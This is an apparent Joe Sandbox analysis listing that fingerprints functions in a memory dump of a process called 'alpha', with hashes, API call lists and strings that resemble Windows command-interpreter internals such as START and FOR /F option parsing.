                                                                                                  • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                  • Instruction ID: b49e022e1f6f7388d69f0c1ec66d1aa41d257a134d75b7a2d1f0f7fc7a0c9762
                                                                                                  • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                  • Instruction Fuzzy Hash: D3C01234704646A7EB1C7732646103999647B0C202F54547CC60A82A82DDACD808C234
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DefaultUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 3358694519-0
                                                                                                  • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                  • Instruction ID: 3ce96235199bc744a1a4da9a2b2729aa7b8dc423fca2729c20f2a6aa6e19f1ff
                                                                                                  • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                  • Instruction Fuzzy Hash: 9DE0C2EAD08253ABF5943B42E0513B49993EB78783FE440B5C60F02EC4C96D2885D228
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                  • Instruction ID: 5663b1c2a1c58b2f3add60708e504bb74ed94fddf846b321b2629b8c67e1f688
                                                                                                  • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                  • Instruction Fuzzy Hash: 40F0B425B0979140EA40A757F9501299290AB88BE0B988375EA7C57FC5DE7CD451C700
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                  • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                  • API String ID: 1388555566-2647954630
                                                                                                  • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                  • Instruction ID: f2a6cfb2fc34503dcf8d95f1b79d2c7edda16188968898622f454adf045f91d3
                                                                                                  • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                  • Instruction Fuzzy Hash: 1AA2EB31A0878286EB50AB21E4241BDFBA1FF45746FA08179DA4E47F95DFBCD544C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                  • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                  • API String ID: 511550188-726566285
                                                                                                  • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                  • Instruction ID: d852ab6a451f7d712c8bb0ced2ae2d0a163d92d1f77b10003e8d88227e1f50dd
                                                                                                  • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                  • Instruction Fuzzy Hash: D452D132E0C69286EB64AB15E424279FEE0FB45B46FE44579D94E03B94DFBCE844C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                  • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                  • API String ID: 1738779099-3004636944
                                                                                                  • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                  • Instruction ID: a3340217ca4f38051e41646432df6ac65d608c2f9401f2c466ae5944146c82a7
                                                                                                  • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                  • Instruction Fuzzy Hash: 0E729232F086428AEB50AF65D1242BDB7B1FB4474AFA14079DE0D57B94DFBCA845C360
                                                                                                  APIs
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7F44
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F7F5C
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7F9E
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F7FFF
                                                                                                  • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8020
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8036
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8061
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823F8075
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F80D6
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823F80EA
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F8177
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F819A
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F81BD
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F81DC
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F81FB
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F821A
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823F8239
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8291
                                                                                                  • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F82D7
                                                                                                  • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F82FB
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F831A
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8364
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823F8378
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F839A
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F83AE
                                                                                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F83E6
                                                                                                  • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8403
                                                                                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7823F8418
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                  • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                  • API String ID: 3637805771-3100821235
                                                                                                  • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                  • Instruction ID: 82c7e7ca7683c270b45a5046980076c07089c904d5590b2df0b46c0e3ba687a2
                                                                                                  • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                  • Instruction Fuzzy Hash: 6EE1C931A047528AEB54AF12F414579FBA0FB49B96BE48274CD0E43B90DFBCA845C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                  • String ID: %s$%s
                                                                                                  • API String ID: 3623545644-3518022669
                                                                                                  • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                  • Instruction ID: 127dc4add57ea4dc3b82a4f1e9be32930758ee85780d7ffeab5c85058e2fba12
                                                                                                  • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                  • Instruction Fuzzy Hash: DFD2C732B0874286EB64AB25E4642BDB7A1FB44746FA0417DDA4E47F94DFBCE844C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                  • String ID: %9d$%s
                                                                                                  • API String ID: 4286035211-3662383364
                                                                                                  • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                  • Instruction ID: d443db47ecbfa6846b77ee6134a7cd23a1006b0a228c9782b6df6b1933e8f0e2
                                                                                                  • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                  • Instruction Fuzzy Hash: E252D832B08B828AEB60AF25E8642FDB7A0FB85746FA04175DA0E47B94DF7CD545C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsrchr$towlower
                                                                                                  • String ID: fdpnxsatz
                                                                                                  • API String ID: 3267374428-1106894203
                                                                                                  • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                  • Instruction ID: aeb88e009ecc193ae8e2883deb81461c5e02de91fc86453f6caec7a665ed3c66
                                                                                                  • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                  • Instruction Fuzzy Hash: CE420826B0868695EBA5AF15D5202BDA7A0FF45B85FA44079DE4E07FC4DF7CE844C310
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                  • String ID: DPATH
                                                                                                  • API String ID: 95024817-2010427443
                                                                                                  • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                  • Instruction ID: ffcc51e529dfadd68b74d418d1ab82f78ed411a0cad2ee2724a8c40e65ed5154
                                                                                                  • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                  • Instruction Fuzzy Hash: 7012EB32A1868286EB60AF11A41017DFBA1FB89752FA4517DEF4E53B94DF7CD844CB20
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [...]$ [..]$ [.]$...$:
                                                                                                  • API String ID: 0-1980097535
                                                                                                  • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                  • Instruction ID: 326df3fa8d2ce2721554a72ea105c3bb5bdc97ca4568fc61828937fd632bc166
                                                                                                  • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                  • Instruction Fuzzy Hash: E932D432A0878386EB60EF21E4642F9B7A0FB45786FA04179DA0D47B95DFBCD545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                  • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                  • API String ID: 1795611712-3662956551
                                                                                                  • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                  • Instruction ID: bbf9fc2481c6f7c57a0c38481fac415da04ac7f831b11a4c864cd4431ac825c4
                                                                                                  • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                  • Instruction Fuzzy Hash: 34E1E461E0860291EB50AB65B8641FDE7A0FF44786FF0417ADA0E53A95DFBCE948C330
                                                                                                  APIs
                                                                                                  • _wcsupr.MSVCRT ref: 00007FF7823FEF33
                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEF98
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFA9
                                                                                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFBF
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823FEFDC
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFED
                                                                                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF003
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF022
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF083
                                                                                                  • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF092
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF0A5
                                                                                                  • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7823FF0DB
                                                                                                  • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF135
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF16C
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF185
                                                                                                    • Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
